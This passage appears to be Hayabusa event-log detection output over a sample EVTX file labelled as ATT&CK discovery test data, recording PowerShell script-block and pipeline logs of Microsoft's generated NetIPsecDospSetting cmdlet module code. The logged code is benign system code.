'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) 
{ foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh 
Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 
+00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration 
enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterTyp",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.098 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"e = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value 